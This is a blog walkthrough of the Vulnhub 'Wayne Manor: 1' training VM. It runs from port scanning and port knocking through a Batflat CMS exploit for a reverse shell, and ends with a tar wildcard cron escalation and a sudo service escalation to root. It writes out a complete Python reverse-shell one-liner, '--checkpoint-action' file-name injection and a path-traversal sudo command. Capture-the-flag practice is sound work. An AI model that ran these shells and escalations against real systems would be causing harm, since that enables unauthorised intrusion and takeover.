Vulnhub Wayne Manor: 1 Walkthrough

http://www.vulnhub.com/entry/wayne-manor-1,681/


Read GUIDELINES.txt in unziped files.

GUIDELINES:
    Add '<ip> waynemanor.com' to the '/etc/hosts' file.
    DHCP is ON.
Enjoy!
You can follow me on Twitter (@sec_balkan), in GitHub (@sec-balkan), or send me a message on Telegram (@sec_balkan).


Add <ip> waynemanor.com to /etc/hosts. (Important!)

Scan ports.

nmap -sV -sC -p- 192.168.33.137  -oN ports.log

图片.png


Scan port 80, no need to wait to end.

图片.png


Check /blog, see some hints. It means knock-knock 300, 350, 400 ports, we will get FTP.

图片.png


Knock it. And scan port again.

knock 192.168.33.137 300 350 400

图片.png


Login ftp as anonymous, get info.txt, check it, get cms credentials.

图片.png


The cms is batflat, search exploit.

图片.png


Listen at one terminal, and run the POC at another terminal, get reverse shell.

nc -nlvp 1234
python3 49573.py http://waynemanor.com/ bruce alfred_help_me 192.168.33.128 1234

图片.png


In /home/batman/.web/, found script.sh.

图片.png


If we use pspy64 to check, we will see crontab runs script.sh each minute.

It is tar wildcard exploit. In order to escalate to user "batman", we need create 3 files in /var/www/html.

echo '' > --checkpoint=1
echo '' > --checkpoint-action=exec=sh pwn.sh
cat<<EOF>pwn.sh 
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.33.128",2234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF


Then we listen at port 2234, and will get reverse shell of user "batman"

图片.png


Check sudo -l.

图片.png


Use /usr/sbin/service to get root.

sudo service ../../bin/sh

图片.png


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.2